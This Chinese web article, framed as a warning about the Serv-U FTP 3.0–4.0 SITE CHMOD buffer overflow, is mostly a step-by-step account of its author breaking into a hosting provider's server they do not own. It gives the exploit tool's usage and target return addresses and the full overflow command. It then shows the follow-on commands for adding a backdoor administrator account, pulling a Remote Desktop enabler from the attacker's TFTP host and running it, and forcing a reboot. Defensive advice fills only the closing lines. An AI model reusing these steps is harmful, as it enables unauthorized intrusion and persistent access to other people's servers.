RSS
当前位置 : 主页>电脑文章>网络技术>

如何防范Serv-U FTP远程缓冲区溢出漏洞攻击

来源:InterNet 作者:InterNet 时间:05-22 17:02:48 浏览:

Serv-U FTP是一款非常流行的FTP服务器软件,它的功能强大,设置简易,被很多空间商朋友作为首选替代微软FTP服务器的软件。不过,它的安全性可不敢恭维,特别是最近爆出一个漏洞:Serv-U FTP远程缓冲区溢出漏洞。这个漏洞是当对一个不存在的长文件名执行“site chmod”命令时,会发生缓冲区溢出,恶意代码溢出后获得Serv-U执行权限,通常还是系统权限。
笔者利用此漏洞对自己的网站空间的主机进行测试了,结果顺利地溢出并最终入侵,过程非常简单!
很多空间商朋友和有自己FTP空间的朋友可能坐不住了,别急!待笔者慢慢把利用这个漏洞来入侵的来龙去脉讲出来,给朋友们提个醒,尽早加强防范。

1.探听目标服务器
笔者在网上闲逛,在安全焦点发现了Serv-U FTP远程缓冲区溢出漏洞的公告,感觉此漏洞危害非常大,由于自己也有网站,惟恐遭到别人破坏,于是准备利用此漏洞测试一下网站空间的主机,看它安全不安全!
这个漏洞是针对于Serv-U FTP的3.0和4.0版本才有效,所以在准备入侵之前,先确定自己的空间的主机FTP是否采用的是这些版本,确定其版本的方法非常简单!你只需要利用FTP程序进行连接,查看FTP的banner信息即可。
我这里以利用Windows自带的FTP程序进行连接,在DOS下输入FTP命令:FTP 空间主机IP 21,很快就连接上了!可以看到其显示的版本信息是4.0(图1),说明符合溢出条件。
符合归符合,不知道它是否已经将此漏洞补上,这就不得而知了。做了一些准备工作,笔者开始入侵。

2.轻松溢出空间主机
下载到漏洞利用程序serv.exe,输入serv.exe可以得到如图2所示的帮助命令。
Usage: heidan <-i ip> <-t type>
[-u user] [-p pass] [-d dir]
[-f ftpport] [-c cbhost] [-s shellport]
[type]:
0 0x7ffa4a1b Serv-U v3.0.0.20~v4.1.0.11 GB 2K/XP ALL
1 0x7ffa2186 Serv-U v3.0.0.20~v4.1.0.11 BG 2K/XP ALL
2 0x6dee6713 Serv-U v3.0.0.20~v4.1.0.11 KR 2K SP4
3 0x77886713 Serv-U v3.0.0.20~v4.1.0.11 EN 2K SP4
4 0x76b42a3a Serv-U v3.0.0.20~v4.1.0.11 EN XP SP1

可以看出,如果要对一个Serv-U FTP服务器进行溢出,必须这样的前提提交:需要知道一个FTP用户名和密码,以及一个可写目录。而笔者刚好符合这个条件,密码和用户是购买空间设置的,可写目录即是笔者的空间的目录。
笔者继续根据命令提示输入溢出命令:
serv.exe –I 目标主机的IP地址 –t 0 –u lj63 –p *** -f 21 –s 146
这个命令的意思是:笔者将溢出目标主机IP,用到了笔者的用户名和密码(FTP用户名lj63和密码***),FTP端口是21,笔者想溢出到的端口是146,猜测主机的type类型是0,即是Serv-U v3.0.0.20~v4.1.0.11 GB 2K/XP ALL。
输入完毕后,开始溢出,很快就得到了一个新的CMD命令行(图3),我很纳闷!不会这么容易就溢出了吧!为了证实我的猜测,输入命令ipconfig查看IP,显示的是主机的IP(图4),看来确实成功溢出了。

3.进一步深入入侵
    步骤1、先查看一下这个主机的基本情况吧! 输入命令net user,看到了远程终端服务自带的帐号:TsInternetUser,有终端服务!爽!
    输入命令net start,查看主机开放了什么服务,结果是没有远程终端服务开放,看来主机管理员怕入侵者利用此漏洞,所以将其关闭了,笔者为了方便,还是将它开启吧!


    步骤2、在开启前下加个后门帐号,输入激活Guest帐号的命令:
    net user guest acvite:/y
    net localgroup administrators guest /add
    将Guest激活并加到管理员组里。
    步骤3、在本地打开tftp32,这是一个利用tftp32的小型程序,可以将本机架设为TFTP服务器,将即将上传的工具3389.exe放在同一目录下,3389.exe是一个可以自动开启远程终端服务的小程序!
    在溢出的DOS中输入上传命令:tftp –I 目标机器IP get 3389.exe,可以看到tftp32开始工作了,可以看到发送字节数和速度!很快就上传完毕了(图5)。
    这个程序会自动上传到当前路径下,即:c:\winnt\system32下,然后直接在溢出的DOS命令行中输入3389.exe,这样即可运行它!
    由于需要目标主机重新启动,远程终端服务才会开启,我这里用同样的方法上传shutdown.exe,这是一个运行只后即可重新启动主机的小工具。
    就这样很简单的将远程终端服务开启了!
    过了一会,我估计主机已经重新启动过了,打开远程终端连接器,填写IP进行连接,填写后门帐号即可进入(图6)!
    一次简单的入侵就这么结束了,由于笔者旨在测试这个漏洞的危害,既然已经测试成功,已经没有必要在空间主机里放什么后门了,毕竟笔者是在人家的地盘上买的房子,不敢太过分了^_^!

 

    写这个漏洞入侵的目的只是给广大空间商们提个醒,国内大部分空间商的FTP服务器软件还是处于3.0-4.0之间,希望看到此漏洞的入侵过程之后,赶快把FTP服务器软件换成5.0版本,免得你的客户跟我一样溢出入侵你的主机!